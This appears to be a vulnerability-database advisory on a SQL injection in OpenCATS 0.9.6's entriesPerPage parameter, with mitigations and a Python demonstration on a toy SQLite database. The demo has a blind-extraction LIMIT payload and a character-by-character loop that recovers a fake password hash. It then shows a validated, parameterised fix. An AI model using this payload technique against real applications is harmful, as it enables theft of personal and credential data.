CVE-2022-43021: n/a in n/a

Medium
Published: Wed Oct 19 2022 (10/19/2022, 00:00:00 UTC)
Source: CVE
Vendor/Project: n/a
Product: n/a

Description

OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the entriesPerPage variable.

AI-Powered Analysis

Last updated: 07/05/2025, 02:41:30 UTC

Technical Analysis

CVE-2022-43021 is a medium-severity SQL injection vulnerability (CWE-89) in OpenCATS version 0.9.6, an open-source applicant tracking system used for recruitment management. The flaw is in the handling of the 'entriesPerPage' variable, which controls how many entries a paginated listing shows: the value is taken from the request and used in a SQL query without being validated as an integer or bound as a query parameter, so an attacker who can supply it can alter the query the application sends to its database. The reported CVSS 3.1 components (network attack vector, low privileges required, no user interaction, unchanged scope, high confidentiality impact, no integrity or availability impact) correspond to the vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N and a base score of 6.5. Because the parameter is a count rather than free text, the realistic outcome is data extraction: an attacker could read sensitive rows from the underlying database, such as candidate records, user credentials or other confidential recruitment data, rather than modify data or disrupt the service. Exploitation requires an authenticated, low-privileged account (PR:L), which limits the attack surface to users who can reach the affected listing. At the time of this analysis no public exploit had been reported and no official patch or vendor advisory was available.

Potential Impact

For European organizations using OpenCATS, particularly HR departments and recruitment agencies, this vulnerability poses a risk of unauthorized data disclosure. Sensitive personal data of candidates and employees, protected under GDPR, could be exposed, leading to regulatory penalties and reputational damage. The confidentiality breach could also facilitate further attacks, such as identity theft or social engineering. Since the vulnerability requires authenticated access, the risk is higher if internal accounts are compromised or if weak access controls allow unauthorized users to reach the vulnerable functionality. The lack of integrity and availability impact reduces the risk of data manipulation or service disruption, but the exposure of confidential data remains a significant concern. Organizations relying on OpenCATS for recruitment workflows should consider the potential for insider threats or compromised credentials to escalate the impact of this vulnerability.

Mitigation Recommendations

European organizations should immediately review and restrict access to OpenCATS instances, ensuring that only trusted, authenticated users can reach the application. Because 'entriesPerPage' is a numeric pagination setting, the correct code-level fix is to accept only a positive integer within a sensible upper bound, fall back to a default otherwise, and pass the resulting integer to the database as a bound query parameter; string sanitization or escaping of the raw value is not a substitute for this. A web application firewall (WAF) with SQL injection rules can add a layer of defense but should not be treated as a fix, since a numeric-context injection can be expressed without the quote characters most signatures key on. Conduct code reviews and penetration testing focused on request parameters that reach SQL, not only this one. Since no official patch was available at the time of this analysis, consider isolating the application within a segmented network zone to limit exposure, and monitor web and database logs for non-numeric 'entriesPerPage' values, unusual query shapes, or a single account paging rapidly through many requests, all of which can indicate extraction attempts. Additionally, enforce strong authentication, including multi-factor authentication (MFA), to reduce the risk that a compromised credential supplies the required authenticated access. Back up sensitive data regularly and ensure incident response plans cover a potential breach of recruitment data.
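The following is an added illustration, not OpenCATS code or the project's own query, of the defect class described above and the fix recommended here. It uses a constructed SQLite schema and a fake admin password hash; the table and column names are invented for the example, and the blind-extraction payload relies on SQLite accepting a scalar subquery in a LIMIT clause, an assumption about this toy backend and not a statement about what the real OpenCATS queries accept. The hardened version shows the integer-validation-plus-bound-parameter approach that makes the raw request value irrelevant to query structure.

```python
"""Constructed illustration of a pagination-parameter SQL injection (CWE-89)
and its fix.  Toy schema and data; not OpenCATS code."""
import re
import sqlite3

# Constructed stand-in for a recruitment database.  The "hash" is a fake
# fixed string so the blind-extraction loop below has something to recover.
FAKE_ADMIN_HASH = "d41d8cd9"
DEFAULT_ENTRIES_PER_PAGE = 15
MAX_ENTRIES_PER_PAGE = 100


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE candidate (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO candidate (name) VALUES (?)",
                     [(f"candidate-{i}",) for i in range(1, 26)])
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, "
                 "username TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO user (username, password_hash) VALUES (?, ?)",
                 ("admin", FAKE_ADMIN_HASH))
    conn.commit()
    return conn


def list_candidates_vulnerable(conn, entries_per_page):
    """CWE-89 pattern: the request value is spliced into the query text."""
    sql = "SELECT name FROM candidate ORDER BY id LIMIT " + entries_per_page
    return [row[0] for row in conn.execute(sql)]


def blind_payload(position, guess):
    """LIMIT expression that yields 1 row if the guess is right, else 0 rows.
    Needs no quote-breaking, so quote-focused WAF signatures will not see it.
    Assumes the backend (SQLite here) accepts a subquery in LIMIT."""
    return ("(SELECT CASE WHEN substr(password_hash, %d, 1) = '%s' THEN 1 ELSE 0 END "
            "FROM user WHERE username = 'admin')" % (position, guess))


def recover_admin_hash(conn, length):
    """Boolean-based blind extraction through the vulnerable listing:
    one character per position, one request per candidate character."""
    recovered = ""
    for pos in range(1, length + 1):
        for c in "0123456789abcdef":
            if len(list_candidates_vulnerable(conn, blind_payload(pos, c))) == 1:
                recovered += c
                break
    return recovered


def parse_entries_per_page(raw):
    """Accept only a positive decimal integer, cap it, else use the default."""
    if not isinstance(raw, str) or not re.fullmatch(r"[1-9][0-9]{0,3}", raw):
        return DEFAULT_ENTRIES_PER_PAGE
    return min(int(raw), MAX_ENTRIES_PER_PAGE)


def list_candidates_hardened(conn, raw_entries_per_page):
    """Validated integer bound as a parameter: the value can never alter
    the query's structure, whatever the request contained."""
    n = parse_entries_per_page(raw_entries_per_page)
    return [row[0] for row in conn.execute(
        "SELECT name FROM candidate ORDER BY id LIMIT ?", (n,))]


if __name__ == "__main__":
    db = make_db()
    print("normal request:", len(list_candidates_vulnerable(db, "10")), "rows")
    print("leaked via vulnerable listing:",
          recover_admin_hash(db, len(FAKE_ADMIN_HASH)))
    print("hardened, same payload:",
          len(list_candidates_hardened(db, blind_payload(1, "d"))),
          "rows (default page size)")
```

The point of the contrast is that the hardened path never has to recognise an attack: any value that is not a small positive integer is simply replaced by the default, and the integer travels to the database as a parameter, so there is no string for an attacker to shape. The blind loop also shows what the log monitoring suggested above would catch: many near-identical listing requests from one account whose 'entriesPerPage' value is not a number.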

Technical Details

Data Version
5.1
Assigner Short Name
mitre
Date Reserved
2022-10-17T00:00:00.000Z
Cisa Enriched
true
Cvss Version
3.1
State
PUBLISHED

Threat ID: 682d9818c4522896dcbd7a41

Added to database: 5/21/2025, 9:08:40 AM

Last enriched: 7/5/2025, 2:41:30 AM

Last updated: 8/1/2025, 6:13:04 PM